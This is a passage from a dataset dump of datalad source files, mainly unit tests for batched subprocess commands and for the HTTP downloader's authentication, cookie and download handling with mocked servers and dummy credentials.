super(DefaultOutputFormatter, self).__init__()\n self.missing = missing\n\n def _d(self, msg, *args):\n # print(\" HERE %s\" % (msg % args))\n pass\n\n def get_value(self, key, args, kwds):\n assert not args\n self._d(\"get_value: %r %r %r\", key, args, kwds)\n return kwds.get(key, self.missing)\n\n # def get_field(self, field_name, args, kwds):\n # assert not args\n # self._d(\"get_field: %r args=%r kwds=%r\" % (field_name, args, kwds))\n # try:\n # out = string.Formatter.get_field(self, field_name, args, kwds)\n # except Exception as exc:\n # # TODO needs more than just a value\n # return \"!ERR %s\" % exc\n\n\nclass DefaultOutputRenderer(object):\n \"\"\"A default renderer for .format'ed output line\n \"\"\"\n def __init__(self, format):\n self.format = format\n # We still need custom output formatter since at the \"first level\"\n # within .format template all items there is no `nadict`\n self.formatter = DefaultOutputFormatter()\n\n @classmethod\n def _dict_to_nadict(cls, v):\n \"\"\"Traverse datastructure and replace any regular dict with nadict\"\"\"\n if isinstance(v, list):\n return [cls._dict_to_nadict(x) for x in v]\n elif isinstance(v, dict):\n return nadict((k, cls._dict_to_nadict(x)) for k, x in v.items())\n else:\n return v\n\n def __call__(self, x, **kwargs):\n dd = nadict(\n (k, nadict({k_.replace(':', '#'): self._dict_to_nadict(v_)\n for k_, v_ in v.items()})\n if isinstance(v, dict) else v)\n for k, v in x.items()\n )\n\n msg = self.formatter.format(self.format, **dd)\n return ui.message(msg)\n" }, { "alpha_fraction": 0.6053465604782104, "alphanum_fraction": 0.6114096641540527, "avg_line_length": 32.911216735839844, "blob_id": "d2783770d008f0d1bb0248ee967228a6864c27bd", "content_id": "05f4e44944ef53fac907a3fff9c76edab01918fa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7257, "license_type": "permissive", "max_line_length": 107, "num_lines": 214, "path": "/datalad/tests/test_cmd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test WitlessRunner\n\"\"\"\nimport sys\nimport unittest.mock\nfrom subprocess import TimeoutExpired\n\nimport pytest\n\nfrom datalad.cmd import (\n BatchedCommand,\n readline_rstripped,\n)\nfrom datalad.cmd import BatchedCommandError\nfrom datalad.runner.tests.utils import py2cmd\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_is_none,\n assert_is_not_none,\n assert_not_equal,\n assert_true,\n)\n\n\ndef test_readline_rstripped_deprecation():\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n class StdoutMock:\n def readline(self):\n return \"abc\\n\"\n readline_rstripped(StdoutMock())\n warn_mock.assert_called_once()\n\n\ndef test_batched_command():\n bc = BatchedCommand(cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"])\n response = bc(\"print('a')\")\n assert_equal(response, \"a\")\n response = bc(\"print(2 + 1)\")\n assert_equal(response, \"3\")\n stderr = bc.close(return_stderr=True)\n assert_is_not_none(stderr)\n\n\ndef test_batched_close_abandon():\n # Expect a timeout if the process 
runs longer than timeout and the config\n # for \"datalad.runtime.stalled-external\" is \"abandon\".\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.1)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(2); exit(1)\\n\".encode())\n\n with unittest.mock.patch(\"datalad.cmd._cfg_val\", \"abandon\"):\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is True)\n assert_is_none(bc.return_code)\n\n\[email protected](\"ignore:Exception ignored\")\ndef test_batched_close_timeout_exception():\n while True:\n try:\n # Expect a timeout at BatchedCommand.close() if the process runs\n # longer than timeout and the config for\n # \"datalad.runtime.stalled-external\" is \"abandon\".\n # In most cases the next commands until `bc.close()` will execute\n # faster than `timeout`. If not we just restart the process\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.5,\n exception_on_timeout=True)\n\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n\n # Send process to sleep for two seconds to trigger a timeout in\n # bc.close().\n bc.stdin_queue.put(\"time.sleep(2); exit(1)\\n\".encode())\n with unittest.mock.patch(\"datalad.cfg\") as cfg_mock:\n cfg_mock.obtain.return_value = \"abandon\"\n try:\n bc.close()\n pytest.fail(\"bc.close() did not generate a timeout\")\n except TimeoutExpired:\n return\n except TimeoutExpired:\n # Timeout occurred early, try again\n continue\n\n\ndef test_batched_close_wait():\n # Expect a long wait and no timeout if the process runs longer than timeout\n # and the config for \"datalad.runtime.stalled-external\" has its default\n # value.\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=.5)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(2); exit(2)\\n\".encode())\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is False)\n assert_equal(bc.return_code, 2)\n\n\ndef test_batched_close_ok():\n # Expect a long wait and no timeout if the process runs longer than timeout\n # seconds and the config for \"datalad.runtime.stalled-external\" has its\n # default value.\n bc = BatchedCommand(\n cmd=[sys.executable, \"-i\", \"-u\", \"-q\", \"-\"],\n timeout=2)\n # Send at least one instruction to start the subprocess\n response = bc(\"import time; print('a')\")\n assert_equal(response, \"a\")\n bc.stdin_queue.put(\"time.sleep(.5); exit(3)\\n\".encode())\n bc.close(return_stderr=False)\n assert_true(bc.wait_timed_out is False)\n assert_equal(bc.return_code, 3)\n\n\ndef test_tuple_requests():\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nimport time\nimport sys\nprint(f\"{time.time()}:{sys.stdin.readline().strip()}\")\n \"\"\"))\n\n start_time_1, line = bc((\"one\", \"line\")).split(\":\")\n assert_equal(line, \"one line\")\n start_time_2, line = bc((\"end\", \"now\")).split(\":\")\n assert_not_equal(start_time_1, start_time_2)\n assert_equal(line, \"end now\")\n bc.close(return_stderr=False)\n\n\ndef test_batched_restart():\n # Expect that the process is restarted after exit.\n bc = BatchedCommand(\n cmd=py2cmd(\n \"import os\\n\"\n \"import sys\\n\"\n \"print(os.getpid(), sys.stdin.readline().strip())\\n\"))\n\n # Send four 
lines\n lines = [f\"line-{i}\" for i in range(4)]\n responses = [bc(lines[i]).split() for i in range(4)]\n pid_set = set([int(r[0]) for r in responses])\n assert_equal(len(pid_set), 4)\n response_lines = [r[1] for r in responses]\n assert_equal(lines, response_lines)\n bc.close(return_stderr=False)\n\n\ndef test_command_fail_1():\n # Expect that a failing command raises a CommandError in which the return\n # code and the last successful request is caught, and that the command is\n # restarted when called again\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nprint(\"something\")\nexit(3)\n \"\"\"))\n\n # Send something to start the process\n first_request = \"line one\"\n result = bc(first_request)\n assert bc.return_code is None\n assert result == \"something\"\n with pytest.raises(BatchedCommandError) as exception_info:\n bc(\"line two\")\n assert exception_info.value.code == 3\n assert exception_info.value.last_processed_request == first_request\n assert bc.return_code == 3\n\n # Check for restart\n result = bc(first_request)\n assert result == \"something\"\n bc.close(return_stderr=False)\n\n\ndef test_command_fail_2():\n # Expect that a failing command raises a BatchedCommandError in which the\n # return code and the last successful request is caught. In this case the\n # last successful request should be None.\n bc = BatchedCommand(\n cmd=py2cmd(\n \"\"\"\nprint(a*b)\n \"\"\"))\n\n # Send something to start the process\n first_request = \"line one\"\n with pytest.raises(BatchedCommandError) as exception_info:\n _ = bc(first_request)\n assert exception_info.value.code == 1\n assert exception_info.value.last_processed_request is None\n assert bc.return_code == 1\n assert bc.last_request is None\n bc.close(return_stderr=False)\n" }, { "alpha_fraction": 0.6473066806793213, "alphanum_fraction": 0.6574836373329163, "avg_line_length": 35.51361083984375, "blob_id": "71866dd9a8de33b277182a674c3fc3e06ca25084", "content_id": "76d931d3c4a96cd438d49c9b4b5d9f76b164a5d3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30854, "license_type": "permissive", "max_line_length": 198, "num_lines": 845, "path": "/datalad/downloaders/tests/test_http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for http downloader\"\"\"\n\nimport builtins\nimport os\nimport re\nimport time\nfrom calendar import timegm\nfrom os.path import join as opj\n\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.network import (\n download_url,\n get_url_straight_filename,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom ...support.exceptions import AccessFailedError\nfrom ..base import (\n BaseDownloader,\n DownloadError,\n IncompleteDownloadError,\n NoneAuthenticator,\n)\nfrom ..credentials import (\n LORIS_Token,\n Token,\n UserPassword,\n)\nfrom ..http import (\n HTMLFormAuthenticator,\n HTTPBaseAuthenticator,\n HTTPBearerTokenAuthenticator,\n HTTPDownloader,\n process_www_authenticate,\n)\n\n# BTW -- mock_open is not in mock on wheezy (Debian 7.x)\ntry:\n import httpretty\nexcept 
(ImportError, AttributeError):\n # Attribute Error happens with newer httpretty and older ssl module\n # https://github.com/datalad/datalad/pull/2623\n class NoHTTPPretty(object):\n __bool__ = lambda s: False\n activate = lambda s, t: t\n httpretty = NoHTTPPretty()\n\nfrom unittest.mock import patch\n\nfrom ...support.exceptions import (\n AccessDeniedError,\n AnonymousAccessDeniedError,\n)\nfrom ...support.network import get_url_disposition_filename\nfrom ...support.status import FileStatus\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n known_failure_githubci_win,\n ok_file_has_content,\n serve_path_via_http,\n skip_if,\n skip_if_no_network,\n swallow_logs,\n swallow_outputs,\n use_cassette,\n with_fake_cookies_db,\n with_memory_keyring,\n with_tempfile,\n with_testsui,\n with_tree,\n without_http_proxy,\n)\nfrom ...utils import read_file\n\n\ndef test_docstring():\n doc = HTTPDownloader.__init__.__doc__\n assert_in(\"\\ncredential: Credential\", doc)\n\n\n# XXX doesn't quite work as it should since doesn't provide context handling\n# I guess... but at least causes the DownloadError ;)\n_builtins_open = builtins.open\n\n\ndef fake_open(write_=None, skip_regex=None):\n class myfile(object):\n \"\"\"file which does nothing\"\"\"\n if write_:\n def write(self, *args, **kwargs):\n write_(*args, **kwargs)\n def close(self):\n pass\n\n def myopen(path, *args, **kwargs):\n if skip_regex and re.search(skip_regex, ensure_unicode(path)):\n return _builtins_open(path, *args, **kwargs)\n else:\n return myfile\n return myopen\n\n\ndef _raise_IOError(*args, **kwargs):\n raise IOError(\"Testing here\")\n\n\ndef test_process_www_authenticate():\n assert_equal(process_www_authenticate(\"Basic\"),\n [\"http_basic_auth\"])\n assert_equal(process_www_authenticate(\"Digest\"),\n [\"http_digest_auth\"])\n assert_equal(process_www_authenticate(\"Digest more\"),\n [\"http_digest_auth\"])\n assert_equal(process_www_authenticate(\"Unknown\"),\n [])\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\ndef test_HTTPDownloader_basic(toppath=None, topurl=None):\n furl = \"%sfile.dat\" % topurl\n tfpath = opj(toppath, \"file-downloaded.dat\")\n downloader = HTTPDownloader() # no auth/credentials needed\n download = downloader.download\n download(furl, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # download() creates leading directories if needed for file targets...\n subdir_tfpath = opj(toppath, \"l1\", \"l2\", \"file-downloaded.dat\")\n download(furl, subdir_tfpath)\n ok_file_has_content(subdir_tfpath, 'abc')\n\n # ... 
and for directory targets.\n subdir_dirtarget = opj(toppath, \"d1\", \"d2\", \"\")\n download(furl, subdir_dirtarget)\n ok_file_has_content(opj(subdir_dirtarget, \"file.dat\"), \"abc\")\n\n # see if fetch works correctly\n assert_equal(downloader.fetch(furl), 'abc')\n\n # By default should not overwrite the file\n assert_raises(DownloadError, download, furl, tfpath)\n # but be able to redownload whenever overwrite==True\n downloaded_path = download(furl, tfpath, overwrite=True)\n assert_equal(downloaded_path, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # Fail with an informative message if we're downloading into a directory\n # and the file name can't be determined from the URL.\n with assert_raises(DownloadError) as cm:\n download(topurl, toppath)\n assert_in(\"File name could not be determined\", str(cm.value))\n\n # Some errors handling\n # XXX obscure mocking since impossible to mock write alone\n # and it still results in some warning being spit out\n # Note: we need to avoid mocking opening of the lock file!\n with swallow_logs(), \\\n patch.object(builtins, 'open', fake_open(write_=_raise_IOError, skip_regex=r'.*\\.lck$')):\n assert_raises(DownloadError, download, furl, tfpath, overwrite=True)\n\n # incomplete download scenario - should have 3 tries\n def _fail_verify_download(try_to_fail):\n try_ = [0]\n _orig_verify_download = BaseDownloader._verify_download\n def _verify_download(self, *args, **kwargs):\n try_[0] += 1\n if try_[0] >= try_to_fail:\n return _orig_verify_download(self, *args, **kwargs)\n raise IncompleteDownloadError()\n return _verify_download\n\n with patch.object(BaseDownloader, '_verify_download', _fail_verify_download(6)), \\\n swallow_logs():\n # how was before the \"fix\":\n #assert_raises(DownloadError, downloader.fetch, furl)\n #assert_raises(DownloadError, downloader.fetch, furl)\n # now should download just fine\n assert_equal(downloader.fetch(furl), 'abc')\n # but should fail if keeps failing all 5 times and then on 11th should raise DownloadError\n with patch.object(BaseDownloader, '_verify_download', _fail_verify_download(7)), \\\n swallow_logs():\n assert_raises(DownloadError, downloader.fetch, furl)\n\n # TODO: access denied scenario\n # TODO: access denied detection\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\n@with_memory_keyring\ndef test_access_denied(toppath=None, topurl=None, keyring=None):\n furl = topurl + \"file.dat\"\n\n def deny_access(*args, **kwargs):\n raise AccessDeniedError(supported_types=[\"http_basic_auth\"])\n\n def deny_anon_access(*args, **kwargs):\n raise AnonymousAccessDeniedError(supported_types=[\"http_basic_auth\"])\n\n downloader = HTTPDownloader()\n\n # Test different paths that should lead to a DownloadError.\n\n for denier in deny_access, deny_anon_access:\n @with_testsui(responses=[\"no\"])\n def run_refuse_provider_setup():\n with patch.object(downloader, '_download', denier):\n downloader.download(furl)\n assert_raises(DownloadError, run_refuse_provider_setup)\n\n downloader_creds = HTTPDownloader(credential=\"irrelevant\")\n\n @with_testsui(responses=[\"no\"])\n def run_refuse_creds_update():\n with patch.object(downloader_creds, '_download', deny_access):\n downloader_creds.download(furl)\n assert_raises(DownloadError, run_refuse_creds_update)\n\n downloader_noauth = HTTPDownloader(authenticator=NoneAuthenticator())\n\n def run_noauth():\n with patch.object(downloader_noauth, '_download', deny_access):\n downloader_noauth.download(furl)\n assert_raises(DownloadError, run_noauth)\n\n # 
Complete setup for a new provider.\n\n @with_testsui(responses=[\n \"yes\", # Set up provider?\n # Enter provider details, but then don't save ...\n \"newprovider\", re.escape(furl), \"http_auth\", \"user_password\", \"no\",\n # No provider, try again?\n \"yes\",\n # Enter same provider detains but save this time.\n \"newprovider\", re.escape(furl), \"http_auth\", \"user_password\", \"yes\",\n # Enter credentials.\n \"me\", \"mypass\"\n ])\n def run_set_up_provider():\n with patch.object(downloader, '_download', deny_access):\n downloader.download(furl)\n\n # We've forced an AccessDenied error and then set up bogus credentials,\n # leading to a 501 (not implemented) error.\n assert_raises(AccessFailedError, run_set_up_provider)\n\n\n@with_tempfile(mkdir=True)\ndef check_download_external_url(url, failed_str, success_str, d, url_final=None, check_mtime=True):\n fpath = opj(d, get_url_straight_filename(url))\n providers = get_test_providers(url) # url for check of credentials\n provider = providers.get_provider(url)\n downloader = provider.get_downloader(url)\n\n # we will load/fetch binary blobs\n success_bytes, failed_bytes = None, None\n if success_str is not None:\n success_bytes = success_str.encode()\n if failed_str is not None:\n failed_bytes = failed_str.encode()\n\n # Download way\n with swallow_outputs() as cmo:\n downloaded_path = downloader.download(url, path=d)\n assert_equal(fpath, downloaded_path)\n content = read_file(fpath, decode=False)\n if success_bytes is not None:\n assert_in(success_bytes, content)\n if failed_str is not None:\n assert_false(failed_bytes in content)\n\n # And if we specify size\n for s in [1, 2]:\n with swallow_outputs() as cmo:\n downloaded_path_ = downloader.download(url, path=d, size=s, overwrite=True)\n # should not be affected\n assert_equal(downloaded_path, downloaded_path_)\n content_ = read_file(fpath, decode=False)\n assert_equal(len(content_), s)\n assert_equal(content_, content[:s])\n\n # Fetch way\n content = downloader.fetch(url, decode=False)\n if success_bytes is not None:\n assert_in(success_bytes, content)\n if failed_bytes is not None:\n assert_false(failed_bytes in content)\n\n # And if we specify size\n for s in [1, 2]:\n with swallow_outputs() as cmo:\n content_ = downloader.fetch(url, size=s, decode=False)\n assert_equal(len(content_), s)\n assert_equal(content_, content[:s])\n\n # Verify status\n status = downloader.get_status(url)\n assert(isinstance(status, FileStatus))\n if not url.startswith('ftp://') and check_mtime:\n # TODO introduce support for mtime into requests_ftp?\n assert(status.mtime)\n assert(status.size)\n\n # Verify possible redirections\n if url_final is None:\n url_final = url\n assert_equal(downloader.get_target_url(url), url_final)\n\n # TODO -- more and more specific\n\n\ndef check_download_external_url_no_mtime(*args, **kwargs):\n \"\"\"A helper to be used in generator tests\n\n since Yarik doesn't know if it is possible to pass optional args,\n and @with_tempfile sticks itself at the end of *args\n \"\"\"\n kwargs['check_mtime'] = False\n return check_download_external_url(*args, **kwargs)\n\n\n# TODO: @use_cassette is not playing nice with generators, causing\n# troubles when trying to cause test skip if no network. 
So disabling for now\n# https://github.com/datalad/datalad/issues/3158\n# @use_cassette('test_authenticate_external_portals', record_mode='once')\ndef test_authenticate_external_portals():\n skip_if_no_network()\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/alm-1/checksums.md5\",\n \"<form action=\",\n \"datafiles/meta_data_files.tar.gz\",\n )\n # seems to be gone\n # check_download_external_url(\n # 'https://db.humanconnectome.org/data/archive/projects/HCP_500/subjects/100307/experiments/100307_CREST/resources/100307_CREST/files/unprocessed/3T/Diffusion/100307_3T_DWI_dir97_LR.bval',\n # \"failed\",\n # \"2000 1005 2000 3000\",\n # )\n check_download_external_url(\n 'https://db.humanconnectome.org/data/experiments/ConnectomeDB_E09797/resources/166768/files/filescans.csv',\n \"failed\",\n \"'Scan','FilePath'\",\n )\n\n check_download_external_url_no_mtime(\n \"https://n5eil01u.ecs.nsidc.org/ICEBRIDGE/IDBMG4.004/1993.01.01/BedMachineGreenland-2021-04-20.nc.xml\",\n 'input type=\"password\"',\n 'DOCTYPE GranuleMetaDataFile',\n )\n\ntest_authenticate_external_portals.tags = ['external-portal', 'network']\n\n\n@skip_if_no_network\n@use_cassette('test_detect_login_error1')\ndef test_detect_login_error1():\n # we had unicode decode issue: https://github.com/datalad/datalad/issues/4951\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/ac-5/docs/data_analysis_instructions.txt\",\n \"<form action=\",\n \"DMR stimulus\")\ntest_detect_login_error1.tags = ['external-portal', 'network']\n\n\n@skip_if_no_network\n@use_cassette('test_detect_login_error2')\ndef test_detect_login_error2():\n # a tiny binary file so we do fetch it but it cannot be decoded, we must not fail\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/mt-3/example_scripts.zip\",\n \"<form action=\",\n None)\ntest_detect_login_error2.tags = ['external-portal', 'network']\n\n\n@known_failure_githubci_win\n@skip_if_no_network\ndef test_download_ftp():\n try:\n import requests_ftp\n except ImportError:\n raise SkipTest(\"need requests_ftp\") # TODO - make it not ad-hoc\n try:\n check_download_external_url(\n \"ftp://ftp.gnu.org/README\",\n None,\n \"This is ftp.gnu.org\"\n )\n except AccessFailedError as exc: # pragma: no cover\n if 'status code 503' in str(exc):\n raise SkipTest(\"ftp.gnu.org throws 503 when on travis (only?)\")\n raise\n\n\n# TODO: redo smart way with mocking, to avoid unnecessary CPU waste\n@with_tree(tree={'file.dat': '1'})\n@serve_path_via_http\n@with_tempfile\ndef test_mtime(path=None, url=None, tempfile=None):\n # let's set custom mtime\n file_to_download = opj(path, 'file.dat')\n os.utime(file_to_download, (time.time(), 1000))\n assert_equal(os.stat(file_to_download).st_mtime, 1000)\n\n file_url = \"%s/%s\" % (url, 'file.dat')\n with swallow_outputs():\n get_test_providers().download(file_url, path=tempfile)\n assert_equal(os.stat(tempfile).st_mtime, 1000)\n\n\ndef test_get_status_from_headers():\n # function doesn't do any value transformation ATM\n headers = {\n 'Content-Length': '123',\n # some other file record - we don't test content here yet\n 'Content-Disposition': 'attachment; filename=\"bogus.txt\"',\n 'Last-Modified': 'Sat, 07 Nov 2015 05:23:36 GMT'\n }\n headers['bogus1'] = '123'\n\n assert_equal(\n HTTPDownloader.get_status_from_headers(headers),\n FileStatus(size=123, filename='bogus.txt', mtime=1446873816))\n\n assert_equal(HTTPDownloader.get_status_from_headers({'content-lengtH': '123'}),\n 
FileStatus(size=123))\n\n    filename = 'Glasser_et_al_2016_HCP_MMP1.0_RVVG.zip'\n    headers_content_disposition = {\n        'Content-Disposition':\n            'Attachment;Filename=\"%s\"' % filename, }\n    assert_equal(\n        HTTPDownloader.get_status_from_headers(headers_content_disposition).filename,\n        filename)\n\n    # since we are providing full headers -- irrelevant\n    assert_equal(get_url_disposition_filename(\"http://irrelevant\", headers_content_disposition),\n                 filename)\n\n\n\n# TODO: test that download fails (even if authentication credentials are right) if form_url\n# is wrong!\n\n\nclass FakeCredential1(UserPassword):\n    \"\"\"Credential to test scenarios.\"\"\"\n    # to be reusable, and not leak across tests,\n    # we should get _fixed_credentials per instance\n    def __init__(self, *args, **kwargs):\n        super(FakeCredential1, self).__init__(*args, **kwargs)\n        self._fixed_credentials = [\n            {'user': 'testlogin', 'password': 'testpassword'},\n            {'user': 'testlogin2', 'password': 'testpassword2'},\n            {'user': 'testlogin2', 'password': 'testpassword3'}\n        ]\n    def is_known(self):\n        return True\n    def __call__(self):\n        return self._fixed_credentials[0]\n    def enter_new(self):\n        # pop last used credential, so we would use \"new\" ones\n        del self._fixed_credentials[0]\n\n\nurl = \"http://example.com/crap.txt\"\ntest_cookie = 'somewebsite=testcookie'\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTMLFormAuthenticator_httpretty(d=None):\n    fpath = opj(d, 'crap.txt')\n\n    credential = FakeCredential1(name='test', url=None)\n    credentials = credential()\n\n    def request_post_callback(request, uri, headers):\n        post_params = request.parsed_body\n        assert_equal(credentials['password'], post_params['password'][0])\n        assert_equal(credentials['user'], post_params['username'][0])\n        assert_not_in('Cookie', request.headers)\n        return (200, headers, \"Got {} response from {}\".format(request.method, uri))\n\n    def request_get_callback(request, uri, headers):\n        assert_equal(request.body, b'')\n        assert_in('Cookie', request.headers)\n        assert_equal(request.headers['Cookie'], test_cookie)\n        return (200, headers, \"correct body\")\n\n    # SCENARIO 1\n    # callback to verify that correct credentials are provided\n    # and then returns the cookie to test again for 'GET'ing\n    httpretty.register_uri(httpretty.POST, url,\n                           body=request_post_callback,\n                           set_cookie=test_cookie)\n    # then in GET verify that correct cookie was provided and\n    # that no credentials are there\n    httpretty.register_uri(httpretty.GET, url,\n                           body=request_get_callback)\n\n    # SCENARIO 2\n    # outdated cookie provided to GET -- must return 403 (access denied)\n    # then our code should POST credentials again and get a new cookies\n    # which is then provided to GET\n\n    # SCENARIO 3\n    # outdated cookie\n    # outdated credentials\n    # it should ask for new credentials (FakeCredential1 already mocks for that)\n    # and then SCENARIO1 must work again\n\n    # SCENARIO 4\n    # cookie and credentials expired, user provided new bad credential\n\n    # Also we want to test how would it work if cookie is available (may be)\n    # TODO: check with correct and incorrect credential\n    authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n                                               password=\"{password}\",\n                                               submit=\"CustomLogin\"))\n    # TODO: with success_re etc\n    # This is a \"success test\" which should be tested in various above scenarios\n    downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n    downloader.download(url, path=d)\n\n
    content = read_file(fpath)\n    assert_equal(content, \"correct body\")\n\n    # Unsuccessful scenarios to test:\n    # the provided URL at the end 404s, or another failure (e.g. interrupted download)\n\n\n@with_memory_keyring\n@with_testsui(responses=['no', 'yes', 'testlogin', 'testpassword'])\ndef test_auth_but_no_cred(keyring=None):\n    authenticator = HTMLFormAuthenticator(\"\")\n    # Replying 'no' to the set credentials prompt should raise ValueError\n    assert_raises(ValueError, HTTPDownloader, credential=None, authenticator=authenticator)\n    # Reply 'yes' and set test user:pass at the next set credentials prompt\n    downloader = HTTPDownloader(credential=None, authenticator=authenticator)\n    # Verify credentials correctly set to test user:pass\n    assert_equal(downloader.credential.get('user'), 'testlogin')\n    assert_equal(downloader.credential.get('password'), 'testpassword')\n\n\n@with_testsui(responses=['yes'])  # will request to reentry it\ndef test_authfail404_interactive():\n    # we will firsts get 'failed' but then real 404 when trying new password\n    check_httpretty_authfail404(['failed', '404'])\n\n\n@with_testsui(interactive=False)  # no interactions -- blow!\ndef test_authfail404_noninteractive():\n    # we do not get to the 2nd attempt so just get 'failed'\n    # and exception thrown inside is not emerging all the way here but\n    # caught in the check_\n    check_httpretty_authfail404(['failed'])\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate\n@with_fake_cookies_db\n@with_tempfile(mkdir=True)\ndef check_httpretty_authfail404(exp_called, d):\n    # mimic behavior of nersc which 404s but provides feedback whenever\n    # credentials are incorrect. In our case we should fail properly\n    credential = FakeCredential1(name='test', url=None)\n\n    was_called = []\n\n    def request_post_callback(request, uri, headers):\n        post_params = request.parsed_body\n        if post_params['password'][0] == 'testpassword2':\n            was_called.append('404')\n            return 404, headers, \"Really 404\"\n        else:\n            was_called.append('failed')\n            return 404, headers, \"Failed\"\n\n    httpretty.register_uri(httpretty.POST, url, body=request_post_callback)\n\n    # Also we want to test how would it work if cookie is available (may be)\n    authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n                                               password=\"{password}\",\n                                               submit=\"CustomLogin\"),\n                                          failure_re=\"Failed\")\n\n    downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n    # first one goes with regular DownloadError -- was 404 with not matching content\n    assert_raises(DownloadError, downloader.download, url, path=d)\n    assert_equal(was_called, exp_called)\n\n\ndef test_auth_bytes_content():\n    # Our regexes are strings, but we can get content in bytes:\n    # I am not sure yet either we shouldn't just skip then testing for regex,\n    # but we definitely should not crash.\n    authenticator = HTTPBaseAuthenticator(failure_re=\"Failed\")\n    authenticator.check_for_auth_failure(b\"bytes\")\n    # but ATM we do test bytes content, let's ENSURE that!\n    with assert_raises(AccessDeniedError):\n        authenticator.check_for_auth_failure(b\"Failed\")\n\n\nclass FakeCredential2(UserPassword):\n    \"\"\"Credential to test scenarios.\"\"\"\n    _fixed_credentials = {'user': 'testlogin', 'password': 'testpassword'}\n    def is_known(self):\n        return True\n    def __call__(self):\n        return self._fixed_credentials\n    def enter_new(self):\n        return self._fixed_credentials\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate
\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db(cookies={'example.com': dict(some_site_id='idsomething', expires='Tue, 15 Jan 2013 21:47:38 GMT')})\ndef test_scenario_2(d=None):\n    fpath = opj(d, 'crap.txt')\n\n    credential = FakeCredential2(name='test', url=None)\n    credentials = credential()\n    authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n                                               password=\"{password}\",\n                                               submit=\"CustomLogin\"))\n\n    def request_get_with_expired_cookie_callback(request, uri, headers):\n        assert_in('Cookie', request.headers)\n        cookie_vals = request.headers['Cookie'].split('; ')\n        for v in cookie_vals:\n            if v.startswith('expires'):\n                expiration_date = v.split('=')[1]\n                expiration_epoch_time = timegm(time.strptime(expiration_date, \"%a, %d %b %Y %H:%M:%S GMT\"))\n                assert_greater(time.time(), expiration_epoch_time)\n        return (403, headers, \"cookie was expired\")\n\n    def request_post_callback(request, uri, headers):\n        post_params = request.parsed_body\n        assert_equal(credentials['password'], post_params['password'][0])\n        assert_equal(credentials['user'], post_params['username'][0])\n        assert_not_in('Cookie', request.headers)\n        return (200, headers, \"Got {} response from {}\".format(request.method, uri))\n\n    def request_get_callback(request, uri, headers):\n        assert_equal(request.body, b'')\n        assert_in('Cookie', request.headers)\n        assert_equal(request.headers['Cookie'], test_cookie)\n        return (200, headers, \"correct body\")\n\n    # SCENARIO 2\n    # outdated cookie provided to GET, return 403 (access denied)\n    # then like SCENARIO 1 again:\n    # POST credentials and get a new cookie\n    # which is then provided to a GET request\n    httpretty.register_uri(httpretty.GET, url,\n                           responses=[httpretty.Response(body=request_get_with_expired_cookie_callback),\n                                      httpretty.Response(body=request_get_callback),\n                                      ])\n\n    # callback to verify that correct credentials are provided\n    # and then returns the cookie to test again for 'GET'ing\n    httpretty.register_uri(httpretty.POST, url,\n                           body=request_post_callback,\n                           set_cookie=test_cookie)\n    # then in another GET is performed to verify that correct cookie was provided and\n    # that no credentials are 